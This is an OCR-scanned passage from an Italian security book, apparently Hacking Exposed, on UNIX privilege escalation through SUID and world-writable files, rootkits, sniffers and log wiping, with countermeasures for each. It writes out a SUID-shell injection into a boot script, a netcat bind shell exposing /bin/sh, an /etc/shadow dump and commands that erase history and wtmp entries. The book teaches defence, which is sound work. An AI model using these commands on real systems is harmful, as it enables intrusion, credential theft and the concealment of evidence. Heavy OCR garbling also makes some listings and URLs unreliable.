due argomenti vengono trattati di seguito. La sicurezza della directory /dev (che 
contiene i dispositivi) non viene analizzata in dettaglio per motivi di spazio: assicu- 
ratevi di assegnare le autorizzazioni corrette a ciascun dispositivo. 

Un hacker che può creare dispositivi o leggere e scrivere su file chiave del sistema 
(per esempio /dev/kmem) o sul disco stesso potrebbe avere facilmente accesso al si- 
stema come root. Un codice dimostrativo interessante è stato sviluppato da Mixter 
ed è disponibile all'indirizzo http://mixter.warrior2k.com/rawpowr.c. Questo 
codice non è però per i deboli di cuore perché potrebbe danneggiare il file system. 
Consigliamo vivamente di eseguirlo su un sistema di test in cui l'eventuale danneg- 
giamento del file system non sia motivo di preoccupazione, 


File SUID 


I file “set user ID root” (SUID) e “set group ID root” (SGID) sono letali! Nessun altro 
file in un sistema UNIX è esposto tanto quanto un file SUID root. Praticamente tutti 
gli attacchi menzionati finora approfittano di processi che sono attivi come utenti 
root: la maggior parte di questi era un programma SUID root. I buffer overflow, gli 
attacchi agli handler dei segnali e ai link simbolici sarebbero tutti inutili se il pro- 
gramma non fosse SUID root. È abbastanza spiacevole che la maggior parte dei di- 
stributori di UNIX utilizzi massicciamente e in maniera troppo disinvolta il bit SUID, 
Gli utenti che non si preoccupano troppo di sicurezza hanno la stessa mentalità: 
sono così pigri da non intraprendere quei pochi passaggi aggiuntivi per svolgere un 
determinato compito e risolvono tutto facendo girare i programmi come root. 

Per sfruttare a proprio vantaggio questa situazione, l'hacker che accede al sistema 
tenta immediatamente di individuare i file SUID e SGID. Di solito viene utilizzato il 
comando find, per rintracciare tutti i file SUID e creare un elenco che può essere 
molto utile per tentare l’accesso a root. Diamo un'occhiata al risultato della ricerca in 
un sistema di serie Linux. Il risultato esposto è stato troncato perché troppo esteso: 


[tsunami]# find / -type f -perm -04000 -1s 


-Pwsr-xr-x 1 root root 30520 May 5 1998 /usr/bin/at 
-Pwsr-xr-x 1 root root 29928 Aug 21 1998 /usr/bin/chage 
“PWSr-xr-xX 1 root root 29240 Aug 21 1998 /usr/bin/gpasswd 
-rwsr-xr-x 1 root root 770132 Oct 11 1998 /usr/bin/dos 
-P-SF-SF-X 1 root root 13876 Oct 02 1998 /usr/bin/lpq 
«P-SP-SF-X 1 root root 15068 Oct 2 1998 /usr/bin/lpr 
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-M-SP-SF-X 1 root root 14732 Oct 2 1998 /usr/bin/lprm 
-PWSr-xr-x 1 root root 42156 Oct 2 1998 /usr/bin/nwsfind 
-P-SP-xr-x 1 root bin 15613 Apr 27 1998 /usr/bin/passwd 
-PWS--X--x 2 root root 464140 Sep 10 1998 /usr/bin/suidperl 


<output omesso per brevità> 


Molti dei programmi elencati (per esempio chage e passwd) richiedono l’imposta- 
zione SUID per poter funzionare. L'hacker si concentra sui programmi SUID di cui 
conosce i problemi passati o che sono probabilmente molto vulnerabili per le loro 
caratteristiche o complessità. Il programma dos potrebbe essere un ottimo punto di 
partenza: crea infatti una macchina virtuale e richiede l’accesso diretto alle risorse 
del sistema per svolgere diverse operazioni. L'hacker è sempre alla ricerca di pro- 
grammi SUID che abbiano qualche caratteristica particolare, o che non debbano in- 
teragire con altri programmi SUID. Svolgiamo qualche ricerca nel file HOWTO del 
programma dos. Siamo interessati a scoprire se ci sia qualche punto vulnerabile 
nell’avvio di dos come SUID. Se è così, abbiamo trovato la nostra strada. 

Il file HOWTO afferma: “Anche se dosemu non utilizza root quando non è necessa- 
rio, è sempre meglio evitare di avviare dosemu come root, specialmente se avviate 
programmi DPMI sotto dosemu. Le più normali applicazioni DOS non necessitano 
che dosemu sia avviato come root, specialmente se avviate dosemu in ambiente X. 
Per questo motivo non dovreste consentire agli utenti di avviare dosemu come 
SUID root, quando è possibile. È possibile effettuare questa impostazione, specifica 
per ogni utente, all’interno del file /etc/dosemu.users”. 

La documentazione afferma chiaramente di non avviare questo programma SUID. 
Nel file /etc/dosemu.users del sistema che stiamo analizzando non c’è alcuna im- 
postazione di limitazione agli utenti. Questo genere di mancata configurazione è 
esattamente quello che un hacker ricerca con ansia. In questo sistema è presente un 
file che offre un'alta probabilità di accesso al sistema come root. Un hacker potreb- 
be ricercare se c'è in giro qualche voce su malfunzionamenti di dos come processo 
SUID o potrebbe sbizzarrirsi alla ricerca di condizioni di buffer overflow, problemi 
ai link simbolici e così via, Questo è un classico caso di programma SUID assoluta- 
mente non necessario, che pone in serio pericolo la sicurezza del sistema. 


D) Contromisure per i file SUID 


La migliore prevenzione consiste nel rimuovere il bit SUID/SGID da quanti più file 
possibile. Non è facile dare un elenco esauriente di file che non devono essere 
SUID, perché esistono grandi differenze tra le varie versioni di UNIX presenti. Qua- 
lunque elenco sarebbe sicuramente incompleto. Vi consigliamo di eseguire un in- 
ventario dei file SUID/SGID del sistema e. verificare caso per caso la necessità di 
questa impostazione. Dovreste utilizzare gli stessi metodi di avvicinamento di un in- 
truso, per valutare quali file possano essere SUID e quali no. Trovate tutti i file 
SUID/SGID e iniziate la ricerca. Il comando seguente rintraccia tutti i file SUID: 


find / -type f -perm -04000 -1s 
Questo invece evidenzia tutti i file SGID: 


find / -type f -perm -02000 -Is 
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Consultate le pagine man, la documentazione e gli HOWTO, per verificare in quali 
casi gli autori raccomandano di rimuovere i file SUID. Dalla vostra analisi potreste 
rimanere sorpresi di quanti file in effetti non richiedano i privilegi SUID/SGID. 
Come sempre, eseguite test di funzionamento in un ambiente separato prima di ri- 
muovere il bit SUID/SGID dai file dei sistemi di produzione. Ricordate che c'è co- 
munque un certo numero di file che deve rimanere SUID per il corretto funziona- 
mento del sistema. 

Gli utenti Linux e HP-Ux possono utilizzare Bastille (http://ww.bastille-linux. 
org/), uno strumento creato da Jay Bale per rafforzare la protezione del loro siste- 
ma contro la maggior parte degli attacchi citati in precedenza, in particolare per ri- 
muovere l'impostazione SUID da numerosi file. Bastille è stata originariamente pro- 
gettata per rafforzare i sistemi RedHat (che ne hanno particolarmente bisogno). Tut- 
tavia le versioni 1.20 e superiori possono essere facilmente adattate ad altre distri- 
buzioni Linux. 


File con accesso in scrittura 


Un altro degli errori più comuni di configurazione consiste nell’autorizzare l'accesso 
in scrittura a file importanti da parte di chiunque, rendendo così possibile la modifi- 
ca di questi ultimi. Anche in questo caso, le impostazioni di questo tipo vengono 
generalmente scelte per motivi di comodità. Le conseguenze in termini di sicurezza 
possono però essere gravi, soprattutto se l'autorizzazione è stata concessa per file 
importanti. L'hacker non trascura nulla, mentre spesso l'amministratore lo fa. Spesso 
i file di inizializzazione del sistema sono impostati in questo modo, così come lo 
sono i file di configurazione o di avvio dell'utente. Vediamo come sia possibile indi- 
viduare e sfruttare file di questo tipo: 


find / -perm -2 -type f -print 


Si ricorre al comando find per individuare file con autorizzazione di accesso in 
scrittura da parte di qualunque utente: 


etc/rc.d/rc3.d/S99local 

Ivarjtmp 

Ivar/tmp/.X11-unix 
Ivar/tmp/.X11-unix/X0 
Ivarftmp/.font-unix 
{var/lib/games/xgalscores 
{var/lib/news/innd/ctlinnda28392 
/var/lib/news/innd/ctlinnda18685 
/var/spool/fax/outgoing 
/Ivar/spool/fax/outgoing/locks 
/home/public 


Osservando il risultato possiamo rilevare qualche problema. Innanzitutto 
Jete/rce.d/rc3.d/S99local è uno script di avvio accessibile a chiunque in scrittu- 
ra. Questa situazione è molto pericolosa perché può essere sfruttata per ottenere i 
privilegi di root. Quando il sistema viene avviato, S99local è appunto eseguito 
come root. Per questo motivo al prossimo riavvio del sistema può essere aperta una 
shell SUID eseguendo questa modifica al file: 


[tsunami] $ echo "/bin/cp /bin/sh /tmp/.sh ; /bin/chmod 4755 /tmp/.sh" \ 
Jete/rc.d/rc3.d/S99local 
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Al successivo avvio viene generata una shell SUID in /tmp. Possiamo vedere che 
anche la directory /home/public è accessibile in scrittura. Ogni file presente in que- 
sta directory può essere sostituito con il semplice utilizzo del comando mv. Questo è 
possibile perché le autorizzazioni sulla directory hanno la precedenza su quelle dei 
file. Un hacker può modificare i file di avvio della shell dell'utente public (per 
esempio .login oppure .bashrc) per creare un file utente SUID. Quando public 
si è connesso al sistema, una sua shell SUTD rimane in attesa di un hacker per esse- 
re utilizzata. 


D Contromisure per i file con accesso in scrittura 


Dovrebbe essere una regola generale utilizzare find per cercare file e directory con 
accesso in scrittura su qualunque sistema dobbiate amministrare. Modificate le auto- 
rizzazioni di ogni file o directory che non hanno motivo di essere pubblici, Potreb- 
be essere difficile riuscire a individuare con esattezza cosa deve o non deve essere 
accessibile in scrittura da tutti, ma il metodo più sicuro consiste nell’affidarsi al buon 
senso. Se state pensando a file di inizializzazione, di configurazione di sistema o a 
file di avvio di utenti, tenete presente che nessuno di questi dovrebbe essere acces- 
sibile in scrittura. Ricordate, invece, che alcuni dispositivi presenti nella directory 
Jdev devono essere accessibili in scrittura. Verificate caso per caso e anche questa 
volta eseguite test in ambienti di collaudo, se potete. 

Anche se non rientra negli scopi di questo libro, possiamo accennare alla possibilità 
di attivare autorizzazioni estese per quei sistemi che le supportano. Potete migliora- 
re la sicurezza dei file abilitando attributi di sola lettura, append (aggiunta in coda al 
file), e immutabilità per alcuni file chiave. Linux (con il comando chattr) e molte 
varianti di BSD consentono di modificare questi attributi, anche se sono utilizzati di 
rado. Combinate gli attributi estesi con i livelli di sicurezza del kernel (se disponibi- 
li) per aumentare il livello di sicurezza del sistema. 


Utilizzo dell’accesso come root 


Dopo aver smaltito la scarica di adrenalina che segue l'avvenuta intrusione, per 
l'hacker arriva il momento di compiere il lavoro vero e proprio. I prossimi passaggi 
saranno il rastrellamento capillare delle informazioni relative al sistema e la predi- 
sposizione di programmi di sniffer per catturare password di login, telnet, ftp, 
smtp e snmp: verrà infine predisposto tutto il necessario per attaccare la prossima 
vittima. Quasi tutte queste tecniche vengono messe in pratica installando sul server 
target opportuni programmi di utilità già pronti che vengono chiamati “rootkit”, 


Rootkit 

Diffusione: 9 
Semplicità: 9 
Impatto: 9 
Fattore di rischio: 9 


Il sistema conquistato diventa il punto di partenza per ogni attacco successivo, per 
cui è importante che l’hacker installi e nasconda i suoi rootkit. Ognuno di questi 
pacchetti generalmente è costituito da quattro gruppi di strumenti, appositamente 
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compilati per quel tipo e per quella versione di UNIX: (1) trojan come versioni alte- 
rate di login, netstat e ps; (2) backdoor come inetd; (3) sniffer che si connettono 
a diversi dispositivi; (4) strumenti per la “pulizia” del log di sistema. 


® Trojan 


Una volta che l’hacker è diventato root, la prima attività consiste nel trasformare in 
trojan tutti i comandi del sistema. Questo è il motivo per cui è necessario monitora- 
re la dimensione e la data di modifica di ogni programma del sistema, ma special- 
mente di quelli più utilizzati, come login, su, telnet, ftp, passwd, netstat, 
ifconfig, 15, ps, ssh, find, du, df, sync, reboot, halt, shutdown e così via. 

Molti rootkit hanno, per esempio, una versione modificata di login. Il programma 
consente la connessione di un utente esattamente come la versione corretta di 10 - 
gin; in aggiunta però questo trojan registra il nome utente e la password in un file, 
per un uso successivo da parte dell’hacker. È disponibile una versione modificata di 
ssh che esegue la stessa funzione. 

Un altro trojan può creare una backdoor verso il vostro sistema, avviando un pro- 
cesso TCP in ascolto e attivando una shell UNIX in connessione inversa. Per esem- 
pio il comando ls potrebbe controllare l'esistenza di un altro trojan e attivare, se 
non presente, una versione personalizzata di netcat che attiva /bin/sh quando 
l'hacker si collega. Il seguente comando, per esempio, attiva netcat in background, 
impostando una connessione in ascolto alla porta TCP 222 e attivando /bin/sh se 
la connessione viene stabilita: 


[tsunami]# nohup nc -1 -p 222 -nvv -e /bin/sh & 
listening on [any] 222 ... 


L’hacker può quindi vedere la sessione seguente quando si collega alla porta TCP 
222, operando poi come utente root: 


[rumble]# nc -nvv 24.8.128.204 222 

(UNKNOWN) [192.168.1.100] 222 (?) open 

cat /etc/shadow 
root:ar90alrR10r41:10783:0:99999:7:-1:-1:134530596 
bin:*:10639:0:99999:7::: 
daemon:*:10639:0:99999:7::: 
adm:*:10639:0:99999:7::: 


Il numero di trojan possibili è limitato solamente dall'immaginazione dell'hacker 
(che tende a essere decisamente grande). Nel Capitolo 14 ne tratteremo altri. 

Il monitoraggio delle porte attive in ascolto è in grado di prevenire questo tipo di at- 
tacco, anche se la contromisura migliore dovrebbe consistere nell’evitare che i file 
binari vengano sostituiti. 


Contromisure ai trojan 


Senza ricorrere ai programmi di utilità adatti, è molto difficile rilevare la presenza di 
trojan: spesso hanno la stessa dimensione del file originale e possono anche avere 
la stessa data, per cui non è sufficiente accontentarsi delle metodologie standard di 
identificazione. Dovete avere a disposizione un programma in grado di calcolare la 
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checksum crittografica del programma, per poter firmare elettronicamente ogni file 
binario e memorizzare in maniera sicura tali firme (per esempio un dischetto o un 
nastro in cassaforte). I più popolari strumenti di calcolo delle checksum sono Trip- 
wire (http://www.tripwire.com) e md5sum: questi programmi consentono di cal- 
colare una firma elettronica per ogni file e stabilire in modo inoppugnabile se il pro- 
gramma è stato modificato. Spesso gli amministratori si ricordano di creare il check- 
sum solo dopo aver subito un attacco: questa non è la soluzione ideale. Fortunata- 
mente, alcuni sistemi vengono forniti con funzionalità di gestione integrate che 
comprendono degli algoritmi di hash abbastanza robusti. Per esempio, molte distri- 
buzioni Linux utilizzano il formato RPM (RedHat Package Manager). Parte delle 
specifiche di RPM includono i checksum MD5. Come utilizzare questa funzionalità 
dopo che un sistema è stato manomesso? Ricorrendo a una copia conosciuta e affi- 
dabile di rpm, è possibile interrogare una distribuzione non manomessa per verifica- 
re se i file eseguibili associati sono stati modificati: 


[@shadow]# rpm -Vvp ftp://ftp.redhat.com/pub/redhat/\ 
redhat-6.2/1i386/RedHat/RPMS/fileutils-4.0-21.i386.rpm 


Sobrero /bin/1s 


Nel nostro esempio, /bin/1s fa parte del pacchetto fileutils fornito con RedHat 6,2. 
Come si può vedere, la presenza di “5” indica che /bin/1s è stato modificato. Que- 
sto significa che il checksum MDS del file eseguibile è diverso da quello della distri- 
buzione. Una buona indicazione che la macchina si trova nelle mani di qualcuno. 
Per i sistemi Solaris, è possibile scaricare un database completo di checksum MD5 
all'indirizzo http://ww.sun.com/software/security/download.html. Si tratta 
del database Solaris Fingerprint gestito da Sun, che può tornare utile a tutti gli am- 
ministratori Solaris. 

Se il vostro sistema viene manomesso non è molto utile ricorrere a nastri di backup 
per ripristinare i file: anche i backup potrebbero essere stati “infettati”. Per ripristi- 
nare il sistema spesso è necessario reinstallare tutto dai dischi originali. 


O) Sniffer 


Se il vostro sistema è stato invaso da un utente root non autorizzato, avete seri pro- 
blemi, ma le conseguenze peggiori potrebbero venire da programmi in costante 
ascolto del traffico di rete installati sul server espugnato. Quelli che vengono nor- 
malmente chiamati sriffer (dal nome del noto software di monitoraggio di rete di 
Network General, ora parte di Network Associates, Inc.) sono lo strumento più de- 
vastante che un hacker è in grado di utilizzare. Perché? Consentono agli hacker di 
colpire qualunque sistema in comunicazione con il server violato, e praticamente 
tutti i sistemi presenti nello stesso segmento di rete. 


Che cos’è uno sniffer? 


Gli sniffer sono nati come risposta alla necessità di avere uno strumento che ese- 
guisse il debug delle comunicazioni in rete; catturano i pacchetti che circolano sulla 
rete, li interpretano e li memorizzano per un’analisi successiva. In questo modo, gli 
ingegneri di rete possono vedere cosa succede, e sono in grado di individuare e ri- 
solvere i problemi di comunicazione consultando il traffico di rete nella forma pri- 
mordiale. Di seguito potete vedere un esempio di intercettazione dei pacchetti. Il 
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nome utente è “guest” e la password è “guest”. Vengono visualizzati anche tutti i co- 
mandi che l’utente esegue successivamente. 


ne [SYN] (slot 1) 
pc6 => target3 [23] 

%&& #'$ANSI"!guest 

guest 

ls 

cd / 

1s 

cd /etc 

cat /etc/passwd 

more hosts.equiv 

more /root/.bash_history 


Come la maggior parte dei potenti strumenti di amministrazione delle reti, anche 
questo è stato trasformato nel corso degli anni per poter supportare le malefatte de- 
gli hacker più smaliziati. Potete immaginare la quantità di preziose informazioni che 
passa attraverso un segmento di rete anche in un breve lasso di tempo. È possibile 
intercettare coppie di nome utente e password, messaggi di posta elettronica confi- 
denziali, interi file contenenti informazioni finanziarie, industriali, grafici di vendita 
e così via. Prima o poi qualunque cosa tradotta in bit e byte è trasmessa in rete ed 
è quindi captabile da uno sniffer in ascolto. 

Anche se discuteremo di come difenderci da queste orecchie indiscrete, noi speria- 
mo che stiate cominciando a comprendere quanto possono essere pericolosi tali 
strumenti se messi nelle mani di un hacker. Niente è più al sicuro se sono stati in- 
stallati sniffer, perché la quasi totalità delle informazioni trasmesse è comunicata in 
chiaro. dsniff (http://ww.monkey.org/-dugsong/dsniff), sviluppato da Dug- 
Song, è il nostro sniffer preferito ed è disponibile all'indirizzo http://packet- 
storm-security.org/sniffers/ insieme con gli altri sniffer più diffusi. 


Funzionamento degli sniffer 


Il modo migliore per comprendere il funzionamento degli sniffer consiste nell’anali- 
si di uno sniffer che si connette a una rete Ethernet. Ovviamente, ne esistono per 
ogni tipo di rete, ma visto che Fthernet è la tipologia più diffusa, ci soffermeremo 
sulla sua analisi. Potete applicare gli stessi principi ad altre architetture di rete. 

Uno sniffer Ethernet è un programma che funziona in stretto collegamento con l’in- 
terfaccia di rete (NIC), per ascoltare tutto il traffico che attraversa la scheda, piutto- 
sto che intercettare solo quello indirizzato a essa. Di norma, una scheda di rete 
Fthernet scarta tutto il traffico che non è diretto esplicitamente alla scheda o all’indi- 
rizzo di broadcast della rete, per cui la scheda deve essere impostata per passare a 
una speciale modalità, chiamata modalità promiscua. In questo modo la scheda è 
abilitata a ricevere tutti i pacchetti che attraversano il segmento di rete. 

Una volta che la scheda è posta in modalità promiscua, lo sniffer può catturare tutto il 
traffico che attraversa il segmento Ethernet. Questo in qualche modo lo limita, perché la 
scheda (e di conseguenza il software) non è in grado di intercettare il traffico al di fuori 
del dominio di collisione (ossia al di là di router, switch e altri dispositivi di segmenta- 
zione). Ovviamente uno sniffer posizionato in un segmento backbone, in un collega- 
mento tra reti o in altri punti di aggregazione di reti diverse, sarà in grado di intercettare 
alti volumi di traffico rispetto a quello in ascolto su un segmento Ethernet isolato. 

Ora che abbiamo illustrato i principi di funzionamento di uno sniffer, consideriamo- 
ne alcuni in particolare e descriviamo come poterli intercettare. 
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Sniffer più diffusi 


La Tabella 7.2 non può certamente ritenersi esaustiva, ma questi sono gli strumenti 
che abbiamo incontrato (e utilizzato) con maggior frequenza in diversi anni di certi- 
ficazioni di sicurezza. 


© Contromisure agli sniffer 


Esistono sostanzialmente tre approcci fondamentali in grado di sconfiggere gli snif- 
fer presenti sulla vostra rete. 


Impiego di topologie segmentate di rete 


Una rete Ethernet condivisa è decisamente vulnerabile alle tecnologie di sniffing, 
dal momento che tutto il traffico è trasmesso alle postazioni sullo stesso segmento. 
L'adozione di switch consente di posizionare ogni postazione in un cosiddetto do- 
minio di collisione, in modo che solamente il traffico destinato allo specifico host (e 
il traffico in broadcast) raggiunga la scheda di rete. Un altro vantaggio dell'impiego 
degli switch consiste nel miglioramento complessivo delle prestazioni di rete. Visto 
che il costo dei dispositivi di switch si avvicina sempre più a quello dei dispositivi 
condivisi, non c'è alcun motivo valido per adottare ancora un'architettura Ethernet 
condivisa. Se l'ufficio di IT non comprende mostrategli le loro password, ottenute 
utilizzando uno dei programmi elencati nella tabella seguente: vedrete che vi pren- 
deranno più in considerazione. 


Tabella 7.2 |più diffusi programmi “sniffer" gratuiti per UNIX 


Nome 


Sniffit di Brecht 
Claerhout (“coder”) 


TCPDump 3.x di Steve 
McCanne, Craig Leres e 
Van Jacobson 


Linsniff di Mike Edulla 
Solsniff di Michael R. 
Widner 

Dsniff 


Snort 
Ethereal 


Reperibilità 


http://reptile.rug.ac. 
be/-coder/sniffit/ 
sniffit.html 


http://www-nrg.ee. 
lbl.gov/ 


http://www.rootshell.com/ 


http://ww.rootshell. com/ 


http://www. monkey. 
org/-dugsong 


http://ww.snort.org 
http://ww.ethereal.com 


Descrizione 


Un semplice sniffer di pac- 
chetti che può essere impie- 
gato in Linux, SunOS, Solaris, 
FreeBSD e Irix. 

Il classico strumento di analisi 
dei pacchetti, disponibile per 
diverse piattaforme. 
Progettato specificamente per 
intercettare le password di Li- 
nux. 

Uno sniffer modificato per 
poter funzionare in ambiente 
Sun Solaris 2.x. 

Uno degli sniffer tra i più effi- 
caci disponibili. 

Uno sniffer a tutto tondo. 

Un fantastico sniffer freeware 
con una grande quantità di 
decodifiche. 


Sebbene le reti commutate aiutino a sconfiggere gli hacker inesperti, esse possono 
essere facilmente trasformate per intercettare il traffico di una rete locale. Un 
programma come arpredirect, che fa parte del pacchetto dsniff di Dug Song 
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(http://ww.monkey.org/-dugsong/dsniff/), è in grado di corrompere la sicu- 
rezza fornita dalla maggior parte degli switch. Vi rimandiamo al Capitolo 10 per una 
trattazione completa di arpredirect. 


Intercettazione degli sniffer 


Esistono due metodi fondamentali per intercettare gli sniffer: il primo basato sugli 
host e il secondo sulla rete. Il primo metodo consiste nell’individuazione delle sche- 
de di rete che stanno funzionando in modalità promiscua. Esistono diversi program- 
mi per ambiente UNIX in grado di fornire questa informazione, tra cui CPM (Check 
Promiscuous Mode) della Carnegie Mellon University (disponibile al sito ftp://co- 
ast.cs.purdue.edu/pub/tools/unix/cpm/). 

Gli sniffer sono anche visibili nell'elenco dei processi e di solito generano file di log 
che tendono a diventare sempre più voluminosi: potete usare semplici script UNIX 
e utilizzare i comandi ps, lsof e grep per intercettare attività sospette sui server. Gli 
hacker più intelligenti cercheranno anche di mascherare i processi di sniff sotto fal- 
so nome, e di nascondere i file di log in directory nascoste, per cui queste tecniche 
non sono sempre efficaci. 

L'intercettazione degli sniffer basata sulla rete è stata a lungo ipotizzata e di recente 
qualcuno ha anche scritto un programma che ha trasformato la teoria in pratica: il 
programma è AntiSniff e gli autori sono il gruppo di ricerca LOpht Heavy Industries 
(http://ww.defcon.tv.sniffers/antisniff/). 

Oltre a AntiSniff, sentinel (http://ww.packetfactory.net/Projects/Senti- 
nel/), può essere eseguito da un sistema UNIX e dispone di funzionalità avanzate 
di intercettazione del traffico di rete in modalità promiscua. 


Cifratura delle trasmissioni (SSH, IPSec) 


La soluzione a lungo termine per gli spioni di rete è la cifratura. Solamente la cifra- 
tura end-to-end (in cui cioè sono i due estremi a cifrare e decifrare le comunicazio- 
ni) può garantire la sicurezza e l’integrità quasi assolute del traffico di rete, La lun- 
ghezza della chiave di cifratura dev'essere determinata sulla base del tempo di riser- 
vatezza dell'informazione: lunghezze inferiori della chiave (40 bit) possono essere 
utilizzate per cifrare dati che perdono validità rapidamente, con la possibilità di otti- 
mizzare le prestazioni. 

Il protocollo Secure Shell (SSH) viene utilizzato dalla comunità UNIX quando è ne- 
cessario il login remoto e cifrato a un server. Le versioni gratuite per uso non com- 
merciale o didattico possono essere reperite al sito http: //ww.ssh.com/download/. 
OpenSSH è un'alternativa open source gratuita introdotta dal gruppo OpenBSD di- 
sponibile all'indirizzo ww. openssh.com. 

Il protocollo IPSec (/P Security Protocol) è stato proposto come standard Internet 
per autenticare e cifrare il traffico IP. Esistono decine di distributori di prodotti basa- 
ti su IPSec: potete ricercare sulla rete Internet tutte le informazioni e le caratteristi 
che. Per gli utenti Linux consigliamo di consultare il progetto FreeSWAN all’indiriz- 
zo http://ww.freeswan.org/intro.html per un'implementazione open source 
gratuita di IPSec e IKE. 


® Pulizia dei file di log 


L’hacker che non vuole lasciare tracce delle sue visite (e che soprattutto non vuole 
lasciarne alla polizia) si preoccupa quasi sempre di fare pulizia nei file di log, elimi- 
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nando le tracce delle operazioni svolte. Esistono tantissimi programmi in grado di 
pulire i file di log e ogni buon rootkit dispone dei propri strumenti. I più popolari 
sono zap, wzap, wted e remove. In molti casi è comunque sufficiente un normale 
editor come vi o emacs 

Ovviamente il primo passo per la rimozione delle impronte lasciate dal sistema con- 
siste nell’eliminazione della registrazione del login. 

Scopriamo quale sia la tecnica più corretta da impiegare curiosando nel file di con- 
figurazione /etc/syslog.conf. Per esempio dal file syslog.conf mostrato di se- 
guito, scopriamo che la maggior parte delle registrazioni di login può essere trovata 
nella directory /var/log/: 


[quake]# cat /etc/syslog.conf 

# Log all kernel messages to the console. 

# Logging much else clutters up the screen. 

#kern.* /dev/console 

# Log anything (except mail) of level info or higher. 

# Don't log private authentication messages! 
*.info;mail.none;authpriv.none /var/log/messages 
# The authpriv file has restricted access. 


authpriv.* /Ivar/log/secure 
# Log all the mail messages in one place. 
mail.* {var/log/maillog 


# Everybody gets emergency messages, plus log them on another 

# machine. 

*.,emerg » 

# Save mail and news errors of level err and higher ina 

# special file. 

uucp,news.crit /var/log/spooler 


Grazie a queste informazioni l’hacker sa che deve ricercare in /var/log i file di log 
principali. Con un semplice elenco dei file presenti scopriamo una quantità di file di 
log, tra cui cron, maillog, messages, spooler, secure (il log del wrapper TCP), 
wtmp e xferlog. 

Alcuni di questi file devono essere modificati; tra questi indichiamo messages, se - 
cure, wtmp e xferlog. Dal momento che il file di log wtmp è in formato binario (e di 
regola è utilizzato solamente dal comando who), l'hacker di solito utilizza uno dei 
programmi di utilità del rootkit per modificarlo. wzap è il programma specifico per il 
file wtmp ed elimina da questo solamente l’utente specificato. Per esempio, per av- 
viare wzap, eseguite il comando seguente: 


[quake]# who ./wtmp 


joel ftpd17264 Jul 1 12:09 (172.16.11.204) 
root ttyi Jul 4 22:21 
root ttyl Jul 9 19:45 
root ttyl Jul 9 19:57 
root tty1 Jul 9 21:48 
root tty1 Jul 9 21:53 
root ttyi Jul 9 22:45 
root ttyl Jul 10 12:24 
joel ttyl Jul 11 09:22 
stuman  ttyl Jul 11 09:42 
root ttyi Jul 11 09:42 


root ttyl Jul 11 09:51 


root ttyi Jul 11 
joel ftpd841 Jul 11 
root ttyl Jul 14 
joel ftpd3137 Jul 15 
joel ftpd82 Jul 15 
joel ftpd945 Jul 17 
root ttyi Jul 24 


[quake]# /opt/wzap 


Enter username to zap from the wtmp: 
opening file... 
opening output file... 


[quake]# who ./wtmp.out 


working... 

root ttyi 
root ttyl 
root ttyl 
root ttyt 
root ttyi 
root ttyi 
root ttyil 
stuman ttyi 
root ttyl 
root ttyl 
root ttyl 
root ttyi 
root ttyl 
root ttyl 


Jul 
Jul 
Jul 
Jul 
Jul 
Jul 
Jul 
Jul 
Jul 
Jul 
Jul 
Jul 
Jul 
Jul 


:51 (172 
105 
«DI <UVI2 
*37..(172 
114 (172 
114 


.16.11.205) 
.+16.11.205) 


.16.11.205) 
.16.11.205) 


joel 
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Il nuovo file di log in output (wtmp. out) non contiene registrazioni per l’utente “jo- 
el”. Il comando di copia di wtmp. out in wtmp completa l'operazione rimuovendo la 
voce del file di log. Alcuni programmi come zap (versione per SunOS 4.x) modifica- 
no effettivamente la data e l'ora dell’ultimo login (come se venisse utilizzato il co- 
mando finger). Per procedere, è possibile modificare manualmente (con vi o 
emacs) file di log secure, messages e xferlog, rimuovendo la registrazione delle 


attività incriminate. 


Come ultimo passaggio è necessario rimuovere la cronologia dei comandi eseguiti. 
Molte shell UNIX mantengono traccia dei comandi utilizzati per facilitare la ripeti- 
zione e l'esecuzione multipla degli stessi. Per esempio la shell Bourne Again 
(/bin/bash) conserva traccia dei comandi nella directory home dell’utente (anche 
in quella dell’utente root): il file si chiama .bash_history e contiene l'elenco degli 
ultimi comandi eseguiti. In genere, come ultimo passaggio prima di disconnettersi, 
l'hacker rimuoverà il contenuto di questo file. Per esempio il file .bash_history 
potrebbe essere simile al seguente: 


tail -f /var/log/messages 


vi chat-ppp@ 
kill -9 1521 
logout 


<l'intruso attacca il sistema ed inizia il suo lavoro in questo punto> 


i 
pwd 


cat /etc/shadow >> /tmp/.badstuff/sh.log 
cat /etc/hosts >> /tmp/.badstuff/ho.log 
cat /etc/groups >> /tmp/.badstuff/gr.log 
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netstat -na >> /tmp/.badstuff/ns.log 

arp -a >> /tmp/.badstuff/a.log 

/sbin/ifconfig >> /tmp/.badstuff/if.log 

find / -name -type f -perm -4000 >> /tmp/.badstuff/suid.log 
find / -name -type f -perm -2000 >> /tmp/.badstuff/sgid.log 


Con un semplice editor di testo l'hacker può rimuovere i comandi dal file e utilizza- 
re il comando touch per impostare nuovamente la data e l'ora dell’ultima modifica 
del file. Altrimenti è possibile evitare la registrazione dei comandi disabilitando que- 
sta funzione della shell, nel modo seguente: 


Unset HISTFILE; unset SAVEHIST 


Oppure l'hacker potrebbe dirigere l'output del file .bash_history verso 
/dev/null: 


[rumble]# ln -s /dev/null -/.bash_history 

[rumble]# 1s -1 .bash_history 

lrwxrwxrwx 1 root root 9 Jul 26 22:59 .bash_history -> 
/dev/null 


Contromisure alla manomissione dei file di log 


La cosa più importante è cercare di dirigere il file di log verso un supporto difficile 
da modificare. Questo potrebbe essere un file system che supporta gli attributi este- 
si e contiene l'impostazione append (solo accodamento) per i file di log. In questo 
modo le informazioni di registrazione delle attività possono essere solamente scritte 
in coda al file e non modificate, Questa non è una soluzione sempre valida, perché 
gli hacker possono aggirare questo meccanismo. Il secondo metodo che vi propo- 
niamo consiste nel dirottare i log in file crittografati sicuri con syslog. Ricordate che 
se il vostro sistema è stato attaccato con successo, non è assolutamente possibile 
confidare sulla lettura dei log di sistema, perché questi potrebbero essere stati ma- 
nomessi con estrema facilità. 


® Rootkit del kernel 


Abbiamo perso un po’ di tempo a esaminare i rootkit tradizionali che modificano e 
trasformano in trojan i file esistenti dopo che il sistema è stato manomesso. Questo 
tipo di sotterfugio è passato di moda. Le varianti dei rootkit più recenti e insidiose 
sono quelle basate sul kernel, che modificano il kernel UNIX in esecuzione per in- 
gannare tutti i programmi di sistema senza modificare i programmi stessi. 

Di solito viene utilizzata la funzionalità LKM (Loadable Kernel Module) per caricare 
un modulo aggiuntivo nel kernel, senza che sia necessario compilare nuovamente il 
kernel: essa consente di caricare e scaricare moduli kernel a piacere, riducendo al 
tempo stesso le dimensioni del kernel eseguito. Di conseguenza, è possibile compi- 
